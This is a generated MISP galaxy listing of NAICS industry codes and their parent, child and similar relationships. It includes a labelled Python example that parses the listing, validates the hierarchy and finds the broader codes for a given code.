The tag is: misp-galaxy:naics="56162"

56162 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

561621

Security Systems Services (except Locksmiths)

The tag is: misp-galaxy:naics="561621"

561621 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

561622

Locksmiths

The tag is: misp-galaxy:naics="561622"

561622 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

5617

Services to Buildings and Dwellings

The tag is: misp-galaxy:naics="5617"

5617 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56171" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561710" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56172" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561720" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56173" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561730" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56174" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561740" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56179" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561790" with estimative-language:likelihood-probability="likely"

56171

Exterminating and Pest Control Services

The tag is: misp-galaxy:naics="56171"

56171 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561710" with estimative-language:likelihood-probability="likely"

561710

Exterminating and Pest Control Services

The tag is: misp-galaxy:naics="561710"

561710 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56171" with estimative-language:likelihood-probability="likely"

56172

Janitorial Services

The tag is: misp-galaxy:naics="56172"

56172 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561720" with estimative-language:likelihood-probability="likely"

561720

Janitorial Services

The tag is: misp-galaxy:naics="561720"

561720 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56172" with estimative-language:likelihood-probability="likely"

56173

Landscaping Services

The tag is: misp-galaxy:naics="56173"

56173 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561730" with estimative-language:likelihood-probability="likely"

561730

Landscaping Services

The tag is: misp-galaxy:naics="561730"

561730 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56173" with estimative-language:likelihood-probability="likely"

56174

Carpet and Upholstery Cleaning Services

The tag is: misp-galaxy:naics="56174"

56174 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561740" with estimative-language:likelihood-probability="likely"

561740

Carpet and Upholstery Cleaning Services

The tag is: misp-galaxy:naics="561740"

561740 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56174" with estimative-language:likelihood-probability="likely"

56179

Other Services to Buildings and Dwellings

The tag is: misp-galaxy:naics="56179"

56179 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561790" with estimative-language:likelihood-probability="likely"

561790

Other Services to Buildings and Dwellings

The tag is: misp-galaxy:naics="561790"

561790 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56179" with estimative-language:likelihood-probability="likely"

5619

Other Support Services

The tag is: misp-galaxy:naics="5619"

5619 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56192" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56199" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561990" with estimative-language:likelihood-probability="likely"

56191

Packaging and Labeling Services

The tag is: misp-galaxy:naics="56191"

56191 has relationships with:

  • child-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561910" with estimative-language:likelihood-probability="likely"

561910

Packaging and Labeling Services

The tag is: misp-galaxy:naics="561910"

561910 has relationships with:

  • child-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56191" with estimative-language:likelihood-probability="likely"

56192

Convention and Trade Show Organizers

The tag is: misp-galaxy:naics="56192"

56192 has relationships with:

  • child-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561920" with estimative-language:likelihood-probability="likely"

561920

Convention and Trade Show Organizers

The tag is: misp-galaxy:naics="561920"

561920 has relationships with:

  • child-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56192" with estimative-language:likelihood-probability="likely"

56199

All Other Support Services

The tag is: misp-galaxy:naics="56199"

56199 has relationships with:

  • child-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561990" with estimative-language:likelihood-probability="likely"

561990

All Other Support Services

The tag is: misp-galaxy:naics="561990"

561990 has relationships with:

  • child-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56199" with estimative-language:likelihood-probability="likely"

562

Waste Management and Remediation Services

The tag is: misp-galaxy:naics="562"

562 has relationships with:

  • child-of: misp-galaxy:naics="56" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

5621

Waste Collection

The tag is: misp-galaxy:naics="5621"

5621 has relationships with:

  • child-of: misp-galaxy:naics="562" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562119" with estimative-language:likelihood-probability="likely"

56211

Waste Collection

The tag is: misp-galaxy:naics="56211"

56211 has relationships with:

  • child-of: misp-galaxy:naics="5621" with estimative-language:likelihood-probability="likely"

562111

Solid Waste Collection

The tag is: misp-galaxy:naics="562111"

562111 has relationships with:

  • child-of: misp-galaxy:naics="5621" with estimative-language:likelihood-probability="likely"

562112

Hazardous Waste Collection

The tag is: misp-galaxy:naics="562112"

562112 has relationships with:

  • child-of: misp-galaxy:naics="5621" with estimative-language:likelihood-probability="likely"

562119

Other Waste Collection

The tag is: misp-galaxy:naics="562119"

562119 has relationships with:

  • child-of: misp-galaxy:naics="5621" with estimative-language:likelihood-probability="likely"

5622

Waste Treatment and Disposal

The tag is: misp-galaxy:naics="5622"

5622 has relationships with:

  • child-of: misp-galaxy:naics="562" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562219" with estimative-language:likelihood-probability="likely"

56221

Waste Treatment and Disposal

The tag is: misp-galaxy:naics="56221"

56221 has relationships with:

  • child-of: misp-galaxy:naics="5622" with estimative-language:likelihood-probability="likely"

562211

Hazardous Waste Treatment and Disposal

The tag is: misp-galaxy:naics="562211"

562211 has relationships with:

  • child-of: misp-galaxy:naics="5622" with estimative-language:likelihood-probability="likely"

562212

Solid Waste Landfill

The tag is: misp-galaxy:naics="562212"

562212 has relationships with:

  • child-of: misp-galaxy:naics="5622" with estimative-language:likelihood-probability="likely"

562213

Solid Waste Combustors and Incinerators

The tag is: misp-galaxy:naics="562213"

562213 has relationships with:

  • child-of: misp-galaxy:naics="5622" with estimative-language:likelihood-probability="likely"

562219

Other Nonhazardous Waste Treatment and Disposal

The tag is: misp-galaxy:naics="562219"

562219 has relationships with:

  • child-of: misp-galaxy:naics="5622" with estimative-language:likelihood-probability="likely"

5629

Remediation and Other Waste Management Services

The tag is: misp-galaxy:naics="5629"

5629 has relationships with:

  • child-of: misp-galaxy:naics="562" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56292" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56299" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562998" with estimative-language:likelihood-probability="likely"

56291

Remediation Services

The tag is: misp-galaxy:naics="56291"

56291 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="562910" with estimative-language:likelihood-probability="likely"

562910

Remediation Services

The tag is: misp-galaxy:naics="562910"

562910 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56291" with estimative-language:likelihood-probability="likely"

56292

Materials Recovery Facilities

The tag is: misp-galaxy:naics="56292"

56292 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="562920" with estimative-language:likelihood-probability="likely"

562920

Materials Recovery Facilities

The tag is: misp-galaxy:naics="562920"

562920 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56292" with estimative-language:likelihood-probability="likely"

56299

All Other Waste Management Services

The tag is: misp-galaxy:naics="56299"

56299 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

562991

Septic Tank and Related Services

The tag is: misp-galaxy:naics="562991"

562991 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

562998

All Other Miscellaneous Waste Management Services

The tag is: misp-galaxy:naics="562998"

562998 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

61

Educational Services

The tag is: misp-galaxy:naics="61"

61 has relationships with:

  • parent-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

611

Educational Services

The tag is: misp-galaxy:naics="611"

611 has relationships with:

  • child-of: misp-galaxy:naics="61" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6117" with estimative-language:likelihood-probability="likely"

6111

Elementary and Secondary Schools

The tag is: misp-galaxy:naics="6111"

6111 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611110" with estimative-language:likelihood-probability="likely"

61111

Elementary and Secondary Schools

The tag is: misp-galaxy:naics="61111"

61111 has relationships with:

  • child-of: misp-galaxy:naics="6111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611110" with estimative-language:likelihood-probability="likely"

611110

Elementary and Secondary Schools

The tag is: misp-galaxy:naics="611110"

611110 has relationships with:

  • child-of: misp-galaxy:naics="6111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61111" with estimative-language:likelihood-probability="likely"

6112

Junior Colleges

The tag is: misp-galaxy:naics="6112"

6112 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611210" with estimative-language:likelihood-probability="likely"

61121

Junior Colleges

The tag is: misp-galaxy:naics="61121"

61121 has relationships with:

  • child-of: misp-galaxy:naics="6112" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611210" with estimative-language:likelihood-probability="likely"

611210

Junior Colleges

The tag is: misp-galaxy:naics="611210"

611210 has relationships with:

  • child-of: misp-galaxy:naics="6112" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61121" with estimative-language:likelihood-probability="likely"

6113

Colleges, Universities, and Professional Schools

The tag is: misp-galaxy:naics="6113"

6113 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611310" with estimative-language:likelihood-probability="likely"

61131

Colleges, Universities, and Professional Schools

The tag is: misp-galaxy:naics="61131"

61131 has relationships with:

  • child-of: misp-galaxy:naics="6113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611310" with estimative-language:likelihood-probability="likely"

611310

Colleges, Universities, and Professional Schools

The tag is: misp-galaxy:naics="611310"

611310 has relationships with:

  • child-of: misp-galaxy:naics="6113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61131" with estimative-language:likelihood-probability="likely"

6114

Business Schools and Computer and Management Training

The tag is: misp-galaxy:naics="6114"

6114 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61143" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611430" with estimative-language:likelihood-probability="likely"

61141

Business and Secretarial Schools

The tag is: misp-galaxy:naics="61141"

61141 has relationships with:

  • child-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611410" with estimative-language:likelihood-probability="likely"

611410

Business and Secretarial Schools

The tag is: misp-galaxy:naics="611410"

611410 has relationships with:

  • child-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61141" with estimative-language:likelihood-probability="likely"

61142

Computer Training

The tag is: misp-galaxy:naics="61142"

61142 has relationships with:

  • child-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611420" with estimative-language:likelihood-probability="likely"

611420

Computer Training

The tag is: misp-galaxy:naics="611420"

611420 has relationships with:

  • child-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61142" with estimative-language:likelihood-probability="likely"

61143

Professional and Management Development Training

The tag is: misp-galaxy:naics="61143"

61143 has relationships with:

  • child-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611430" with estimative-language:likelihood-probability="likely"

611430

Professional and Management Development Training

The tag is: misp-galaxy:naics="611430"

611430 has relationships with:

  • child-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61143" with estimative-language:likelihood-probability="likely"

6115

Technical and Trade Schools

The tag is: misp-galaxy:naics="6115"

6115 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611519" with estimative-language:likelihood-probability="likely"

61151

Technical and Trade Schools

The tag is: misp-galaxy:naics="61151"

61151 has relationships with:

  • child-of: misp-galaxy:naics="6115" with estimative-language:likelihood-probability="likely"

611511

Cosmetology and Barber Schools

The tag is: misp-galaxy:naics="611511"

611511 has relationships with:

  • child-of: misp-galaxy:naics="6115" with estimative-language:likelihood-probability="likely"

611512

Flight Training

The tag is: misp-galaxy:naics="611512"

611512 has relationships with:

  • child-of: misp-galaxy:naics="6115" with estimative-language:likelihood-probability="likely"

611513

Apprenticeship Training

The tag is: misp-galaxy:naics="611513"

611513 has relationships with:

  • child-of: misp-galaxy:naics="6115" with estimative-language:likelihood-probability="likely"

611519

Other Technical and Trade Schools

The tag is: misp-galaxy:naics="611519"

611519 has relationships with:

  • child-of: misp-galaxy:naics="6115" with estimative-language:likelihood-probability="likely"

6116

Other Schools and Instruction

The tag is: misp-galaxy:naics="6116"

6116 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611610" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61162" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611620" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61163" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611630" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61169" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611691" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611692" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611699" with estimative-language:likelihood-probability="likely"

61161

Fine Arts Schools

The tag is: misp-galaxy:naics="61161"

61161 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611610" with estimative-language:likelihood-probability="likely"

611610

Fine Arts Schools

The tag is: misp-galaxy:naics="611610"

611610 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61161" with estimative-language:likelihood-probability="likely"

61162

Sports and Recreation Instruction

The tag is: misp-galaxy:naics="61162"

61162 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611620" with estimative-language:likelihood-probability="likely"

611620

Sports and Recreation Instruction

The tag is: misp-galaxy:naics="611620"

611620 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61162" with estimative-language:likelihood-probability="likely"

61163

Language Schools

The tag is: misp-galaxy:naics="61163"

61163 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611630" with estimative-language:likelihood-probability="likely"

611630

Language Schools

The tag is: misp-galaxy:naics="611630"

611630 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61163" with estimative-language:likelihood-probability="likely"

61169

All Other Schools and Instruction

The tag is: misp-galaxy:naics="61169"

61169 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

611691

Exam Preparation and Tutoring

The tag is: misp-galaxy:naics="611691"

611691 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

611692

Automobile Driving Schools

The tag is: misp-galaxy:naics="611692"

611692 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

611699

All Other Miscellaneous Schools and Instruction

The tag is: misp-galaxy:naics="611699"

611699 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

6117

Educational Support Services

The tag is: misp-galaxy:naics="6117"

6117 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61171" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611710" with estimative-language:likelihood-probability="likely"

61171

Educational Support Services

The tag is: misp-galaxy:naics="61171"

61171 has relationships with:

  • child-of: misp-galaxy:naics="6117" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611710" with estimative-language:likelihood-probability="likely"

611710

Educational Support Services

The tag is: misp-galaxy:naics="611710"

611710 has relationships with:

  • child-of: misp-galaxy:naics="6117" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61171" with estimative-language:likelihood-probability="likely"
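
The entries above follow one fixed shape, and the relationships encode conventions that the listing never states outright: a `child-of` or `parent-of` target is always a prefix of the code (NAICS is a prefix hierarchy, and here 5- and 6-digit codes are linked directly to the 4-digit industry group), a `similar` pair is always a 5-digit industry and its 6-digit national code ending in 0, and every link is declared from both ends. The Python below is an added example, not part of the generated MISP galaxy documentation or of the MISP project's code: it parses entries in this exact shape, validates those conventions, and expands a code to its broader codes so that an event tagged with a narrow NAICS tag can be matched against broader ones. `SAMPLE` is a constructed excerpt of three entries copied from this listing; `BROKEN` is the same excerpt with one link deliberately wrong; the regexes and function names are the example's own assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt in the shape of the generated listing above (three
# NAICS entries copied from it, not the whole galaxy).  Blank lines are
# irrelevant to the parser, so the excerpt is kept compact.
SAMPLE = """\
6117
Educational Support Services
The tag is: misp-galaxy:naics="6117"
6117 has relationships with:
  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="61171" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="611710" with estimative-language:likelihood-probability="likely"
61171
Educational Support Services
The tag is: misp-galaxy:naics="61171"
61171 has relationships with:
  • child-of: misp-galaxy:naics="6117" with estimative-language:likelihood-probability="likely"
  • similar: misp-galaxy:naics="611710" with estimative-language:likelihood-probability="likely"
611710
Educational Support Services
The tag is: misp-galaxy:naics="611710"
611710 has relationships with:
  • child-of: misp-galaxy:naics="6117" with estimative-language:likelihood-probability="likely"
  • similar: misp-galaxy:naics="61171" with estimative-language:likelihood-probability="likely"
"""

# Same excerpt with one child-of link deliberately pointed at the wrong
# industry group (constructed here to exercise the checker).
BROKEN = SAMPLE.replace('child-of: misp-galaxy:naics="6117"',
                        'child-of: misp-galaxy:naics="6116"', 1)

TAG_RE = re.compile(r'^The tag is: misp-galaxy:naics="(\d+)"$')
REL_RE = re.compile(
    r'^•\s+(child-of|parent-of|similar):\s+misp-galaxy:naics="(\d+)"'
    r'\s+with\s+estimative-language:likelihood-probability="([^"]+)"$')


@dataclass
class Cluster:
    code: str
    name: str
    relations: list = field(default_factory=list)  # (type, target code, likelihood)


def parse_listing(text):
    """Turn the rendered listing into {naics code: Cluster}."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    clusters, current = {}, None
    for i, ln in enumerate(lines):
        m = TAG_RE.match(ln)
        if m:
            # The human-readable title is the non-blank line right before the tag line.
            current = Cluster(code=m.group(1), name=lines[i - 1])
            clusters[current.code] = current
            continue
        m = REL_RE.match(ln)
        if m and current is not None:
            current.relations.append((m.group(1), m.group(2), m.group(3)))
    return clusters


def _has(cluster, rtype, target):
    return any(r == rtype and t == target for r, t, _ in cluster.relations)


def check_hierarchy(clusters):
    """Return human-readable inconsistencies; an empty list means the excerpt is consistent."""
    findings = []
    for c in clusters.values():
        for rtype, target, _likelihood in c.relations:
            if rtype in ("child-of", "parent-of"):
                broad, narrow = (target, c.code) if rtype == "child-of" else (c.code, target)
                # NAICS is a prefix hierarchy: the narrower code extends the broader one.
                if not (len(broad) < len(narrow) and narrow.startswith(broad)):
                    findings.append(f"{c.code} {rtype} {target}: not a prefix")
                # A link whose other end is in the listing must be declared from both sides.
                other = clusters.get(target)
                back = "parent-of" if rtype == "child-of" else "child-of"
                if other is not None and not _has(other, back, c.code):
                    findings.append(f"{target} lacks {back} {c.code}")
            elif rtype == "similar":
                # The 6-digit national code ending in 0 names the same industry as its 5-digit code.
                five, six = sorted((c.code, target), key=len)
                if not (len(five) == 5 and six == five + "0"):
                    findings.append(f"{c.code} similar {target}: not a 5/6-digit pair")
    return findings


def lineage(clusters, code):
    """Broader codes reached by following child-of links; a code absent from the listing ends the chain."""
    chain, seen = [], {code}
    while code in clusters:
        parents = [t for r, t, _ in clusters[code].relations if r == "child-of"]
        if not parents or parents[0] in seen:  # no parent, or a cycle in a malformed listing
            break
        code = parents[0]
        seen.add(code)
        chain.append(code)
    return chain


if __name__ == "__main__":
    good = parse_listing(SAMPLE)
    print("consistent:", check_hierarchy(good) == [])
    print("broader codes of 611710:", lineage(good, "611710"))
    print("findings in BROKEN:", check_hierarchy(parse_listing(BROKEN)))
```

Run against the excerpt, `check_hierarchy` returns no findings and `lineage` for 611710 yields 6117 and then 611, which shows the listing's convention of linking national codes straight to the 4-digit group rather than through the 5-digit industry. Against `BROKEN` it reports both the non-prefix link and the missing reciprocal `child-of`, which is the kind of check worth running over a whole galaxy file before relying on its tags for correlation.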

62

Health Care and Social Assistance

The tag is: misp-galaxy:naics="62"

62 has relationships with:

  • parent-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624" with estimative-language:likelihood-probability="likely"

621

Ambulatory Health Care Services

The tag is: misp-galaxy:naics="621"

621 has relationships with:

  • child-of: misp-galaxy:naics="62" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6215" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6216" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6219" with estimative-language:likelihood-probability="likely"

6211

Offices of Physicians

The tag is: misp-galaxy:naics="6211"

6211 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621112" with estimative-language:likelihood-probability="likely"

62111

Offices of Physicians

The tag is: misp-galaxy:naics="62111"

62111 has relationships with:

  • child-of: misp-galaxy:naics="6211" with estimative-language:likelihood-probability="likely"

621111

Offices of Physicians (except Mental Health Specialists)

The tag is: misp-galaxy:naics="621111"

621111 has relationships with:

  • child-of: misp-galaxy:naics="6211" with estimative-language:likelihood-probability="likely"

621112

Offices of Physicians, Mental Health Specialists

The tag is: misp-galaxy:naics="621112"

621112 has relationships with:

  • child-of: misp-galaxy:naics="6211" with estimative-language:likelihood-probability="likely"

6212

Offices of Dentists

The tag is: misp-galaxy:naics="6212"

6212 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621210" with estimative-language:likelihood-probability="likely"

62121

Offices of Dentists

The tag is: misp-galaxy:naics="62121"

62121 has relationships with:

  • child-of: misp-galaxy:naics="6212" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621210" with estimative-language:likelihood-probability="likely"

621210

Offices of Dentists

The tag is: misp-galaxy:naics="621210"

621210 has relationships with:

  • child-of: misp-galaxy:naics="6212" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62121" with estimative-language:likelihood-probability="likely"

6213

Offices of Other Health Practitioners

The tag is: misp-galaxy:naics="6213"

6213 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62134" with estimative-language:likelihood-probability="likely"

